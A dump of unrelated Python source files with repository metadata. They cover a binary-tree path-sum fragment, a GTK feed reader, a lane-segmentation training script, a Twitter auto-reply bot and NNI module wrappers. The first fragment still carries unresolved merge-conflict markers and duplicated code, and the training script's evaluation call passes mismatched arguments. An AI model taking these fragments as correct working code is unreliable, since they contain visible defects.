def DFSpathSum(self, root, res):
if not root:
return 0
left = max(self.DFSpathSum(root.left, res), 0) #results from the left subtree
right = max(self.DFSpathSum(root.right, res), 0) #results from the right subtree
res[0] = max(res[0], left + right + root.val) # update the final results
return max(left, right) + root.val #return to the parent node
=======
# Binary Tree Maximum Path Sum
# Does not need to go through the root or leaf
class Solution(object):
def maxPathSum(self, root):
"""
:type root: TreeNode
:rtype: int
"""
res = [-float('inf')]
self.DFSpathSum(root, res)
return res[0]
def DFSpathSum(self, root, res):
if not root:
return 0
left = max(self.DFSpathSum(root.left, res), 0) #results from the left subtree. Use Max(...) to get rid of the negative sum
right = max(self.DFSpathSum(root.right, res), 0) #results from the right subtree
res[0] = max(res[0], left + right + root.val) # update the final results
return max(left, right) + root.val #return to the parent node
>>>>>>> 18230e1ad4d168e359c92a0c1e54c8c6631b56a1
| [
"xiwangli2010@gmail.com"
] | xiwangli2010@gmail.com |
05205ea19fd7e0e3f0373f1ce85fdf9ee2e29bb3 | db2a5b9cf84f72c264709df106044206fcd26b50 | /jadereader/gui/main_view.py | 5a7f0f2dca5d0cbf342140028cb7436f8903deb1 | [
"Apache-2.0"
] | permissive | pirobtumen/JadeReader | c792baf31753a10015d565b237182596dd49d58a | 8b605d255a68d8de7d08ff4b0cdfb067b95418c3 | refs/heads/master | 2021-01-19T03:04:55.189807 | 2016-07-28T18:11:20 | 2016-07-28T18:11:20 | 51,586,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,053 | py | """
Copyright 2016 Alberto Sola
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
from gi.repository import Gio
from gui.lateral_menu_view import LateralMenu
from gui.source_row_view import SourceRow
from gui.feed_row_view import FeedRow
from src.url.urlmanager import UrlManager
from src.feed.feedmanager import FeedManager
class JadeReaderView(Gtk.Window):
def __init__(self,url_manager):
Gtk.Window.__init__(self, title="Jade Reader")
self.resize(500,300)
# Attributes
# --------------------
self.url_manager = url_manager
self.show_feed = True
# Events
# --------------------
self.connect("delete-event", Gtk.main_quit )
# Widgets
# --------------------
hpane_main = Gtk.HPaned()
self.add(hpane_main)
self.lateral_menu = LateralMenu(self)
hpane_main.add1(self.lateral_menu)
self.set_main_widgets(hpane_main)
# Initialize
# --------------------
self.load_categories( url_manager.get_categories() )
self.show_all()
Gtk.main()
def set_main_widgets(self, container):
main_box = Gtk.VBox()
# Action Bar
action_bar = Gtk.ActionBar()
swap_feed_source_bttn = Gtk.Button("Sources")
swap_feed_source_bttn.connect("clicked", self.swap_feed_source_bttn)
action_bar.add(swap_feed_source_bttn)
#action_bar.add(Gtk.Label("Category:"))
#action_bar.add(Gtk.ComboBox.new_with_entry())
#action_bar.add(Gtk.Label("Site:"))
#action_bar.add(Gtk.ComboBox.new_with_entry())
# ListBox
self.scrolled_window = Gtk.ScrolledWindow()
# Add to the view
main_box.pack_start(action_bar,False,False,0)
main_box.pack_start(self.scrolled_window,True,True,0)
container.add2(main_box)
# --------------------------------------------------------------------------
def load_categories(self, categories_list):
self.lateral_menu.clear()
for category in categories_list:
self.lateral_menu.add_category(category)
def load_data(self, option_selected):
if option_selected == LateralMenu.OPTION_NONE:
# TODO:
pass
elif option_selected == LateralMenu.OPTION_ABOUT:
pass
elif self.show_feed:
self.load_feed(option_selected)
else:
self.load_source(option_selected)
self.show_all()
def load_feed(self, option_selected):
feed_manager = FeedManager()
scrolled_window_child = self.scrolled_window.get_child()
if scrolled_window_child is not None:
self.scrolled_window.remove( scrolled_window_child )
data_listbox = Gtk.ListBox()
if option_selected == LateralMenu.OPTION_ALL:
# TODO: get_all()
categories = self.url_manager.get_categories()
source_list = []
for category in categories:
source_list += self.url_manager.get_category(category)
else:
source_list = self.url_manager.get_category(option_selected)
feed_list = feed_manager.download_feed(source_list)
for feed in feed_list:
data_listbox.add( FeedRow(feed.get_title(), feed.get_data(), feed.get_link()) )
self.scrolled_window.add(data_listbox)
def load_source(self, option_selected):
scrolled_window_child = self.scrolled_window.get_child()
if scrolled_window_child is not None:
self.scrolled_window.remove( scrolled_window_child )
data_listbox = Gtk.ListBox()
if option_selected == LateralMenu.OPTION_ALL:
# TODO: get_all()
categories = self.url_manager.get_categories()
source_list = []
for category in categories:
source_list += self.url_manager.get_category(category)
else:
source_list = self.url_manager.get_category(option_selected)
for source in source_list:
data_listbox.add( SourceRow(source.get_name(), source.get_url(), source.get_feed() ) )
self.scrolled_window.add(data_listbox)
def swap_feed_source_bttn(self,button):
self.show_feed = not self.show_feed
if self.show_feed:
button.set_label("Sources")
else:
button.set_label("Feed")
self.load_data( self.lateral_menu.get_option_selected() )
| [
"albsolac@gmail.com"
] | albsolac@gmail.com |
29b8202e6ae862d20e5388fd87f63f7fb7a56db7 | b69eed4bd84419459cc5c5e1b3b197a53a931d37 | /v4/completion_segmentation_main_new_front.py | 17b2419c731ab05bd772b11b9f428ae0c0135ef9 | [
"MIT"
] | permissive | gongyan1/CFECA-and-Joint-coding-Model | 7b39b0da1ef01669109f2087823a776fe41e285f | 1d9c4c0769c526024d3d855d316e26473bd4688c | refs/heads/master | 2023-06-25T21:28:19.173246 | 2020-06-12T07:20:57 | 2020-06-12T07:20:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,323 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 7 17:48:32 2020
@author: kerui
"""
import argparse
import os
import time
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.optim
import torch.utils.data
from dataloaders.completion_segmentation_loader_new_ import load_calib, oheight, owidth, input_options, KittiDepth
from completion_segmentation_model import DepthCompletionFrontNet
from metrics import AverageMeter, Result
import criteria
import completion_segmentation_helper
from inverse_warp import Intrinsics, homography_from
import numpy as np
import plot
parser = argparse.ArgumentParser(description='Sparse-to-Dense')
parser.add_argument('-w',
'--workers',
default=2,
type=int,
metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--epochs',
default=11,
type=int,
metavar='N',
help='number of total epochs to run (default: 11)')
parser.add_argument('--start-epoch',
default=0,
type=int,
metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('-c',
'--criterion',
metavar='LOSS',
default='l2',
choices=criteria.loss_names,
help='loss function: | '.join(criteria.loss_names) +
' (default: l2)')
parser.add_argument('--image_height',
default=352,
type=int,
help='height of image for train (default: 80)')
parser.add_argument('--image_width',
default=1216,
type=int,
help='width of image for train (default: 80)')
parser.add_argument('-b',
'--batch-size',
default=1,
type=int,
help='mini-batch size (default: 1)')
parser.add_argument('--lr',
'--learning-rate',
default=1e-4,
type=float,
metavar='LR',
help='initial learning rate (default 1e-5)')
parser.add_argument('--weight-decay',
'--wd',
default=0,
type=float,
metavar='W',
help='weight decay (default: 0)')
parser.add_argument('--print-freq',
'-p',
default=10,
type=int,
metavar='N',
help='print frequency (default: 10)')
parser.add_argument('--resume',
default='',
type=str,
metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--data-folder',
default='../data',
type=str,
metavar='PATH',
help='data folder (default: none)')
parser.add_argument('-i',
'--input',
type=str,
default='gd',
choices=input_options,
help='input: | '.join(input_options))
parser.add_argument('-l',
'--layers',
type=int,
default=34,
help='use 16 for sparse_conv; use 18 or 34 for resnet')
parser.add_argument('--pretrained',
action="store_true",
help='use ImageNet pre-trained weights')
parser.add_argument('--val',
type=str,
default="select",
choices=["select", "full"],
help='full or select validation set')
parser.add_argument('--jitter',
type=float,
default=0.1,
help='color jitter for images')
parser.add_argument(
'--rank-metric',
type=str,
default='rmse',
choices=[m for m in dir(Result()) if not m.startswith('_')],
help='metrics for which best result is sbatch_datacted')
parser.add_argument(
'-m',
'--train-mode',
type=str,
default="dense",
choices=["dense", "sparse", "photo", "sparse+photo", "dense+photo"],
help='dense | sparse | photo | sparse+photo | dense+photo')
parser.add_argument('-e', '--evaluate', default='', type=str, metavar='PATH')
parser.add_argument('--cpu', action="store_true", help='run on cpu')
args = parser.parse_args()
args.use_pose = ("photo" in args.train_mode)
# args.pretrained = not args.no_pretrained
args.result = os.path.join('..', 'results/v4')
args.use_rgb = ('rgb' in args.input) or args.use_pose
args.use_d = 'd' in args.input
args.use_g = 'g' in args.input
if args.use_pose:
args.w1, args.w2 = 0.1, 0.1
else:
args.w1, args.w2 = 0, 0
print(args)
cuda = torch.cuda.is_available() and not args.cpu
if cuda:
import torch.backends.cudnn as cudnn
cudnn.benchmark = True
device = torch.device("cuda")
else:
device = torch.device("cpu")
print("=> using '{}' for computation.".format(device))
# define loss functions
'''类别权重
1:99 -> 0.01 0.99
1:9 -> 0.1 0.9
1:8 -> 1/9 8/9
1:4 -> 0.2 0.8
'''
class_weight = torch.tensor([0.1, 0.9])
# 语义分割loss
road_criterion = nn.NLLLoss2d()
lane_criterion = nn.NLLLoss2d(weight=class_weight.cuda())
if args.use_pose:
# hard-coded KITTI camera intrinsics
K = load_calib()
fu, fv = float(K[0, 0]), float(K[1, 1])
cu, cv = float(K[0, 2]), float(K[1, 2])
kitti_intrinsics = Intrinsics(owidth, oheight, fu, fv, cu, cv)
if cuda:
kitti_intrinsics = kitti_intrinsics.cuda()
# 计算准确率
def acc(prediction, label, num_class=2):
bs, c, h, w = prediction.size()
values, indices = prediction.max(1)
acc_total = 0
acc_lane = 0
label_ = label.numpy()
BS = bs
for i in range(bs):
prediction = indices[i].view(h,w).numpy()
label = label_[i]
# 混淆矩阵
mask = (label>=0) & (label<num_class)
result_ = num_class * label[mask].astype('int') + prediction[mask]
count = np.bincount(result_, minlength=num_class**2)
acc_total += (count[0]+count[3])/count.sum()
if count[2:].sum()>100: #only images with obvious lanes will be counted
acc_lane += count[3]/count[2:].sum()
else:
BS -= 1
acc_total /= bs
if BS:
acc_lane /= BS #only images with obvious lanes will be counted
else:
acc_lane = torch.tensor([0.5])
return acc_total, acc_lane
def iterate(mode, args, loader, model, optimizer, logger, best_acc, epoch):
start_val = time.clock()
nonsense = 0
acc_sum = 0
# switch to appropriate mode
assert mode in ["train", "val", "eval", "test_prediction", "test_completion"], \
"unsupported mode: {}".format(mode)
if mode == 'train':
model.train()
lr = completion_segmentation_helper.adjust_learning_rate(args.lr, optimizer, epoch)
else:
model.eval()
lr = 0
lane_acc_lst = []
lane_loss_lst = []
total_acc_lst = []
for i, batch_data in enumerate(loader):
start = time.time()
batch_data = {
key: val.to(device)
for key, val in batch_data.items() if val is not None
}
# 道路分割的label
road_label = batch_data[
'road_label'] if mode != 'test_road_lane_segmentation' else None
# 车道线分割的label
lane_label = batch_data[
'lane_label'] if mode != 'test_road_lane_segmentation' else None
data_time = time.time() - start
start = time.time()
if mode == 'val':
with torch.no_grad(): # 设置torch.no_grad(),在val时不计算梯度,可以节省显存
pred = model(batch_data)
else:
pred = model(batch_data)
lane_pred = pred
start_ = time.clock() # 不计入时间
if mode == 'train':
# 语义分割loss
#road_loss = road_criterion(road_pred, road_label.long())
if epoch==0:
class_weight = torch.tensor([0.5, 0.5])
else:
lane_pred_w = lane_pred.data.cpu()
bs, c, h, w = lane_pred_w.size()
value_w, index_w = lane_pred_w.max(1)
LPW = 0
for i in range(bs):
lpw = index_w[i].view(h,w).numpy()
LPW += (np.count_nonzero(lpw)/lpw.size)
LPW /= bs
class_weight = torch.tensor([LPW,1-LPW])
#print('class_weight: ',class_weight)
lane_criterion = nn.NLLLoss2d(weight=class_weight.cuda())
lane_loss = lane_criterion(lane_pred, lane_label.long())
lane_loss_lst.append(lane_loss.item())
# 损失
#loss = road_loss + lane_loss
loss = lane_loss
#print('lane loss {}'.format(lane_loss.data.cpu()))
# 准确率
#road_acc = acc(road_pred.data.cpu(), road_label.cpu())
total_acc, lane_acc = acc(lane_pred.data.cpu(), lane_label.cpu())
lane_acc_lst.append(lane_acc.item())
total_acc_lst.append(total_acc.item())
#print('total acc {}'.format(total_acc), 'lane acc {}'.format(lane_acc))
#print('\n-------------------------epoch '+str(epoch)+'-----------------------------\n')
optimizer.zero_grad()
loss.backward()
optimizer.step()
elif mode == 'val':
# 准确率
#road_acc = acc(road_pred.data.cpu(), road_label.cpu())
total_acc, lane_acc = acc(lane_pred.data.cpu(), lane_label.cpu())
lane_acc_lst.append(lane_acc.item())
total_acc_lst.append(total_acc.item())
#print('total acc {}'.format(total_acc), 'lane acc {}'.format(lane_acc))
#print('\n------------------------epoch '+str(epoch)+'------------------------------\n')
#accuracy = (road_acc+lane_acc)/2
accuracy = lane_acc
acc_sum += accuracy
gpu_time = time.time() - start
# measure accuracy and record loss
with torch.no_grad():
# 保存预测结果为图片
logger.conditional_save_pred(mode, i, pred, epoch)
nonsense += (time.clock()-start_)
print('total cost time: ', time.clock()-start_val-nonsense)
if mode=='train':
lane_loss_mean = np.array(lane_loss_lst).mean()
lane_acc_mean = np.array(lane_acc_lst).mean()
total_acc_mean = np.array(total_acc_lst).mean()
print('lane loss {}'.format(lane_loss_mean), 'lane acc {}'.format(lane_acc_mean), 'total acc {}'.format(total_acc_mean))
elif mode=='val':
lane_acc_mean = np.array(lane_acc_lst).mean()
total_acc_mean = np.array(total_acc_lst).mean()
print('lane acc {}'.format(lane_acc_mean), 'total acc {}'.format(total_acc_mean))
print('\n-------------------------epoch '+str(epoch)+'-----------------------------\n')
acc_avg = acc_sum/len(loader)
is_best = (acc_avg>best_acc)
# 每一个epoch保存一次信息
# avg = logger.conditional_save_info(mode, average_meter, epoch)
# is_best = logger.rank_conditional_save_best(mode, avg, epoch)
# if is_best and not (mode == "train"):
# # 验证时,保存最好的预测结果为图片
# logger.save_img_comparison_as_best(mode, epoch)
# logger.conditional_summarize(mode, avg, is_best)
if mode == 'train':
return acc_avg, is_best, lane_loss_mean, lane_acc_mean, total_acc_mean
elif mode == 'val':
return acc_avg, is_best, lane_acc_mean, total_acc_mean
def main():
global args
checkpoint = None
is_eval = False
if args.evaluate:
args_new = args
if os.path.isfile(args.evaluate):
print("=> loading checkpoint '{}' ... ".format(args.evaluate),
end='')
checkpoint = torch.load(args.evaluate, map_location=device)
args = checkpoint['args']
args.data_folder = args_new.data_folder
args.val = args_new.val
is_eval = True
print("Completed.")
else:
print("No model found at '{}'".format(args.evaluate))
return
elif args.resume: # optionally resume from a checkpoint
args_new = args
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}' ... ".format(args.resume),
end='')
checkpoint = torch.load(args.resume, map_location=device)
args.start_epoch = checkpoint['epoch'] + 1
args.data_folder = args_new.data_folder
args.val = args_new.val
print("Completed. Resuming from epoch {}.".format(
checkpoint['epoch']))
else:
print("No checkpoint found at '{}'".format(args.resume))
return
print("=> creating model and optimizer ... ", end='')
model = DepthCompletionFrontNet(args).to(device)
model_named_params = [
p for _, p in model.named_parameters() if p.requires_grad
]
optimizer = torch.optim.Adam(model_named_params,
lr=args.lr,
weight_decay=args.weight_decay)
print("completed.")
if checkpoint is not None:
model.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("=> checkpoint state loaded.")
model = torch.nn.DataParallel(model)
# Data loading code
print("=> creating data loaders ... ")
if not is_eval:
train_dataset = KittiDepth('train', args)
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=args.batch_size,
shuffle=True,
num_workers=args.workers,
pin_memory=True,
sampler=None)
print("\t==> train_loader size:{}".format(len(train_loader)))
val_dataset = KittiDepth('val', args)
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=1,
shuffle=False,
num_workers=2,
pin_memory=True) # set batch size to be 1 for validation
print("\t==> val_loader size:{}".format(len(val_loader)))
# create backups and results folder
logger = completion_segmentation_helper.logger(args)
if checkpoint is not None:
logger.best_result = checkpoint['best_result']
print("=> logger created.")
if is_eval:
print("=> starting model evaluation ...")
result, is_best = iterate("val", args, val_loader, model, None, logger,
checkpoint['epoch'])
return
# main loop
print("=> starting main loop ...")
best_acc = 0
# 记录loss, acc
train_lane_loss_list = []
train_lane_acc_list = []
train_total_acc_list = []
val_lane_acc_list = []
val_total_acc_list = []
for epoch in range(args.start_epoch, args.epochs):
print("=> starting training epoch {} ..".format(epoch))
_, _, train_lane_loss, train_lane_acc, train_total_acc = iterate("train", args, train_loader, model, optimizer, logger, best_acc,
epoch) # train for one epoch
train_lane_loss_list.append(train_lane_loss)
train_lane_acc_list.append(train_lane_acc)
train_total_acc_list.append(train_total_acc)
if (epoch%5==0):
result, is_best, val_lane_acc, val_total_acc = iterate("val", args, val_loader, model, None, logger, best_acc, epoch) # evaluate on validation set
val_lane_acc_list.append(val_lane_acc)
val_total_acc_list.append(val_total_acc)
completion_segmentation_helper.save_checkpoint({ # save checkpoint
'epoch': epoch,
'model': model.module.state_dict(),
'best_result': result,
'optimizer' : optimizer.state_dict(),
'args' : args,
}, is_best, epoch, logger.output_directory)
#plot.plot('lane_train', args.epochs, lane_acc_list = train_lane_acc_list, lane_loss_list=train_lane_loss_list)
#plot.plot('lane_val', args.epochs, lane_acc_list = val_lane_acc_list)
with open('log/train_lane_loss_v4_'+time.strftime('%Y-%m-%d-%H:%M:%S',time.localtime(time.time()))+'.txt', 'w+') as f:
train_lane_loss_list_w = [str(line) for line in train_lane_loss_list]
f.writelines('\n'.join(train_lane_loss_list_w))
with open('log/train_lane_acc_v4_'+time.strftime('%Y-%m-%d-%H:%M:%S',time.localtime(time.time()))+'.txt', 'w+') as f:
train_lane_acc_list_w = [str(line) for line in train_lane_acc_list]
f.writelines('\n'.join(train_lane_acc_list_w))
with open('log/train_total_acc_v4_'+time.strftime('%Y-%m-%d-%H:%M:%S',time.localtime(time.time()))+'.txt', 'w+') as f:
train_total_acc_list_w = [str(line) for line in train_total_acc_list]
f.writelines('\n'.join(train_total_acc_list_w))
with open('log/val_lane_acc_v4_'+time.strftime('%Y-%m-%d-%H:%M:%S',time.localtime(time.time()))+'.txt', 'w+') as f:
val_lane_acc_list_w = [str(line) for line in val_lane_acc_list]
f.writelines('\n'.join(val_lane_acc_list_w))
with open('log/val_total_acc_v4_'+time.strftime('%Y-%m-%d-%H:%M:%S',time.localtime(time.time()))+'.txt', 'w+') as f:
val_total_acc_list_w = [str(line) for line in val_total_acc_list]
f.writelines('\n'.join(val_total_acc_list_w))
if __name__ == '__main__':
main()
| [
"630229262@qq.com"
] | 630229262@qq.com |
4a4f0ee250023d867691985d96d7fb0eafcee414 | 31e6ca145bfff0277509dbd7c4b44b8deddf3334 | /Programmers/Level1/Kth_num.py | a5998f0cf2a686d3094fcebc330240582ad25ce3 | [] | no_license | brillantescene/Coding_Test | 2582d6eb2d0af8d9ac33b8e829ff8c1682563c42 | 0ebc75cd66e1ccea3cedc24d6e457b167bb52491 | refs/heads/master | 2023-08-31T06:20:39.000734 | 2021-10-15T10:51:17 | 2021-10-15T10:51:17 | 254,366,460 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | def solution(array, commands):
answer = []
for i, j, k in commands:
tmp = array[i-1:j]
tmp.sort()
answer.append(tmp[k-1])
return answer
print(solution([1, 5, 2, 6, 3, 7, 4], [[2, 5, 3], [4, 4, 1], [1, 7, 3]]))
| [
"glisteneugene@gmail.com"
] | glisteneugene@gmail.com |
ec5c77459b18b633842cfeb1e04194433f5c8999 | 5296fa790a6cc05c4e800feac17186761c148740 | /autoreply.py | c55def9014090f77280f79e8be25596c6e17b22c | [] | no_license | tinyminds/twitterbot | 2b05549e23ac3f5930cbf9660b39decb99111c1a | 4b28147801f7a8443130ec8424c7042ba99b77a8 | refs/heads/master | 2022-12-09T21:38:25.178735 | 2019-11-27T20:41:37 | 2019-11-27T20:41:37 | 224,030,647 | 0 | 0 | null | 2022-12-08T06:58:01 | 2019-11-25T19:58:03 | Python | UTF-8 | Python | false | false | 2,019 | py | #!/usr/bin/env python
# tweepy-bots/bots/autoreply.py
import tweepy
import logging
import time
import sys
import os
from generate_advertisement import get_ad
#from credentials import * # use this one for testing
# use this for production; set vars in heroku dashboard
CONSUMER_KEY = os.environ.get('CONSUMER_KEY')
CONSUMER_SECRET = os.environ.get('CONSUMER_SECRET')
ACCESS_KEY = os.environ.get('ACCESS_KEY')
ACCESS_SECRET = os.environ.get('ACCESS_SECRET')
SINCE_ID = os.environ.get('SINCE_ID')
INTERVAL = 60 * 60 * 6 # tweet every 6 hours
#INTERVAL = 15 # every 15 seconds, for testing
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
def check_mentions(api, keywords, since_id):
logger.info("Retrieving mentions")
new_since_id = since_id
for tweet in tweepy.Cursor(api.mentions_timeline,
since_id=since_id).items():
new_since_id = max(tweet.id, new_since_id)
if tweet.in_reply_to_status_id is not None:
continue
if any(keyword in tweet.text.lower() for keyword in keywords):
logger.info(f"Answering to {tweet.user.screen_name} - {new_since_id}")
if not tweet.user.following:
tweet.user.follow()
api.update_status(
status="Hullo there @" + str(tweet.user.screen_name) + " " + str(get_ad()),
in_reply_to_status_id=tweet.id,
)
return new_since_id
def main():
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
since_id = SINCE_ID #reset env variable with last id if it crashes. find a better way. date?
logger.info(since_id)
while True:
since_id = check_mentions(api, ["hello", "shut up", "hullo", "hi", "hiya", "yo", "morning"], since_id)
logger.info("Waiting...")
logger.info(since_id)
time.sleep(300)
if __name__ == "__main__":
main() | [
"jenny23@gmail.com"
] | jenny23@gmail.com |
aa877b523c25ed2dbd360625b6d019008e5819b4 | 5c0c0176db0ccf2c24b6b5ed459a8dc144518b13 | /nni/retiarii/nn/pytorch/nn.py | 797a672c8cf99ed4ccc35b43fccfc6dc009f0241 | [
"MIT"
] | permissive | petuum/nni | ac4f4a1c4d6df71684eeffa127b7c4858fd29e97 | 8134be6269902939232482d63649c06f9864be6d | refs/heads/master | 2023-02-18T11:21:41.078889 | 2021-01-20T03:21:50 | 2021-01-20T03:21:50 | 302,736,456 | 4 | 3 | MIT | 2020-11-20T20:21:15 | 2020-10-09T19:34:11 | Python | UTF-8 | Python | false | false | 10,748 | py | import logging
from typing import Any, List
import torch
import torch.nn as nn
from ...utils import add_record, blackbox_module, uid, version_larger_equal
_logger = logging.getLogger(__name__)
# NOTE: support pytorch version >= 1.5.0
__all__ = [
'LayerChoice', 'InputChoice', 'Placeholder',
'Module', 'Sequential', 'ModuleList', # TODO: 'ModuleDict', 'ParameterList', 'ParameterDict',
'Identity', 'Linear', 'Conv1d', 'Conv2d', 'Conv3d', 'ConvTranspose1d',
'ConvTranspose2d', 'ConvTranspose3d', 'Threshold', 'ReLU', 'Hardtanh', 'ReLU6',
'Sigmoid', 'Tanh', 'Softmax', 'Softmax2d', 'LogSoftmax', 'ELU', 'SELU', 'CELU', 'GLU', 'GELU', 'Hardshrink',
'LeakyReLU', 'LogSigmoid', 'Softplus', 'Softshrink', 'MultiheadAttention', 'PReLU', 'Softsign', 'Softmin',
'Tanhshrink', 'RReLU', 'AvgPool1d', 'AvgPool2d', 'AvgPool3d', 'MaxPool1d', 'MaxPool2d',
'MaxPool3d', 'MaxUnpool1d', 'MaxUnpool2d', 'MaxUnpool3d', 'FractionalMaxPool2d', "FractionalMaxPool3d",
'LPPool1d', 'LPPool2d', 'LocalResponseNorm', 'BatchNorm1d', 'BatchNorm2d', 'BatchNorm3d', 'InstanceNorm1d',
'InstanceNorm2d', 'InstanceNorm3d', 'LayerNorm', 'GroupNorm', 'SyncBatchNorm',
'Dropout', 'Dropout2d', 'Dropout3d', 'AlphaDropout', 'FeatureAlphaDropout',
'ReflectionPad1d', 'ReflectionPad2d', 'ReplicationPad2d', 'ReplicationPad1d', 'ReplicationPad3d',
'CrossMapLRN2d', 'Embedding', 'EmbeddingBag', 'RNNBase', 'RNN', 'LSTM', 'GRU', 'RNNCellBase', 'RNNCell',
'LSTMCell', 'GRUCell', 'PixelShuffle', 'Upsample', 'UpsamplingNearest2d', 'UpsamplingBilinear2d',
'PairwiseDistance', 'AdaptiveMaxPool1d', 'AdaptiveMaxPool2d', 'AdaptiveMaxPool3d', 'AdaptiveAvgPool1d',
'AdaptiveAvgPool2d', 'AdaptiveAvgPool3d', 'TripletMarginLoss', 'ZeroPad2d', 'ConstantPad1d', 'ConstantPad2d',
'ConstantPad3d', 'Bilinear', 'CosineSimilarity', 'Unfold', 'Fold',
'AdaptiveLogSoftmaxWithLoss', 'TransformerEncoder', 'TransformerDecoder',
'TransformerEncoderLayer', 'TransformerDecoderLayer', 'Transformer',
'Flatten', 'Hardsigmoid'
]
if version_larger_equal(torch.__version__, '1.6.0'):
__all__.append('Hardswish')
if version_larger_equal(torch.__version__, '1.7.0'):
__all__.extend(['Unflatten', 'SiLU', 'TripletMarginWithDistanceLoss'])
class LayerChoice(nn.Module):
def __init__(self, op_candidates, reduction=None, return_mask=False, key=None):
super(LayerChoice, self).__init__()
self.op_candidates = op_candidates
self.label = key if key is not None else f'layerchoice_{uid()}'
self.key = self.label # deprecated, for backward compatibility
for i, module in enumerate(op_candidates): # deprecated, for backward compatibility
self.add_module(str(i), module)
if reduction or return_mask:
_logger.warning('input arguments `reduction` and `return_mask` are deprecated!')
def forward(self, x):
return x
class InputChoice(nn.Module):
def __init__(self, n_candidates=None, choose_from=None, n_chosen=1,
reduction="sum", return_mask=False, key=None):
super(InputChoice, self).__init__()
self.n_candidates = n_candidates
self.n_chosen = n_chosen
self.reduction = reduction
self.label = key if key is not None else f'inputchoice_{uid()}'
self.key = self.label # deprecated, for backward compatibility
if choose_from or return_mask:
_logger.warning('input arguments `n_candidates`, `choose_from` and `return_mask` are deprecated!')
def forward(self, candidate_inputs: List[torch.Tensor]) -> torch.Tensor:
# fake return
return torch.tensor(candidate_inputs) # pylint: disable=not-callable
class ValueChoice:
"""
The instance of this class can only be used as input argument,
when instantiating a pytorch module.
TODO: can also be used in training approach
"""
def __init__(self, candidate_values: List[Any]):
self.candidate_values = candidate_values
class Placeholder(nn.Module):
def __init__(self, label, related_info):
add_record(id(self), related_info)
self.label = label
self.related_info = related_info
super(Placeholder, self).__init__()
def forward(self, x):
return x
class ChosenInputs(nn.Module):
"""
"""
def __init__(self, chosen: List[int], reduction: str):
super().__init__()
self.chosen = chosen
self.reduction = reduction
def forward(self, candidate_inputs):
return self._tensor_reduction(self.reduction, [candidate_inputs[i] for i in self.chosen])
def _tensor_reduction(self, reduction_type, tensor_list):
if reduction_type == "none":
return tensor_list
if not tensor_list:
return None # empty. return None for now
if len(tensor_list) == 1:
return tensor_list[0]
if reduction_type == "sum":
return sum(tensor_list)
if reduction_type == "mean":
return sum(tensor_list) / len(tensor_list)
if reduction_type == "concat":
return torch.cat(tensor_list, dim=1)
raise ValueError("Unrecognized reduction policy: \"{}\"".format(reduction_type))
# the following are pytorch modules
Module = nn.Module
class Sequential(nn.Sequential):
def __init__(self, *args):
add_record(id(self), {})
super(Sequential, self).__init__(*args)
class ModuleList(nn.ModuleList):
def __init__(self, *args):
add_record(id(self), {})
super(ModuleList, self).__init__(*args)
Identity = blackbox_module(nn.Identity)
Linear = blackbox_module(nn.Linear)
Conv1d = blackbox_module(nn.Conv1d)
Conv2d = blackbox_module(nn.Conv2d)
Conv3d = blackbox_module(nn.Conv3d)
ConvTranspose1d = blackbox_module(nn.ConvTranspose1d)
ConvTranspose2d = blackbox_module(nn.ConvTranspose2d)
ConvTranspose3d = blackbox_module(nn.ConvTranspose3d)
Threshold = blackbox_module(nn.Threshold)
ReLU = blackbox_module(nn.ReLU)
Hardtanh = blackbox_module(nn.Hardtanh)
ReLU6 = blackbox_module(nn.ReLU6)
Sigmoid = blackbox_module(nn.Sigmoid)
Tanh = blackbox_module(nn.Tanh)
Softmax = blackbox_module(nn.Softmax)
Softmax2d = blackbox_module(nn.Softmax2d)
LogSoftmax = blackbox_module(nn.LogSoftmax)
ELU = blackbox_module(nn.ELU)
SELU = blackbox_module(nn.SELU)
CELU = blackbox_module(nn.CELU)
GLU = blackbox_module(nn.GLU)
GELU = blackbox_module(nn.GELU)
Hardshrink = blackbox_module(nn.Hardshrink)
LeakyReLU = blackbox_module(nn.LeakyReLU)
LogSigmoid = blackbox_module(nn.LogSigmoid)
Softplus = blackbox_module(nn.Softplus)
Softshrink = blackbox_module(nn.Softshrink)
MultiheadAttention = blackbox_module(nn.MultiheadAttention)
PReLU = blackbox_module(nn.PReLU)
Softsign = blackbox_module(nn.Softsign)
Softmin = blackbox_module(nn.Softmin)
Tanhshrink = blackbox_module(nn.Tanhshrink)
RReLU = blackbox_module(nn.RReLU)
AvgPool1d = blackbox_module(nn.AvgPool1d)
AvgPool2d = blackbox_module(nn.AvgPool2d)
AvgPool3d = blackbox_module(nn.AvgPool3d)
MaxPool1d = blackbox_module(nn.MaxPool1d)
MaxPool2d = blackbox_module(nn.MaxPool2d)
MaxPool3d = blackbox_module(nn.MaxPool3d)
MaxUnpool1d = blackbox_module(nn.MaxUnpool1d)
MaxUnpool2d = blackbox_module(nn.MaxUnpool2d)
MaxUnpool3d = blackbox_module(nn.MaxUnpool3d)
FractionalMaxPool2d = blackbox_module(nn.FractionalMaxPool2d)
FractionalMaxPool3d = blackbox_module(nn.FractionalMaxPool3d)
LPPool1d = blackbox_module(nn.LPPool1d)
LPPool2d = blackbox_module(nn.LPPool2d)
LocalResponseNorm = blackbox_module(nn.LocalResponseNorm)
BatchNorm1d = blackbox_module(nn.BatchNorm1d)
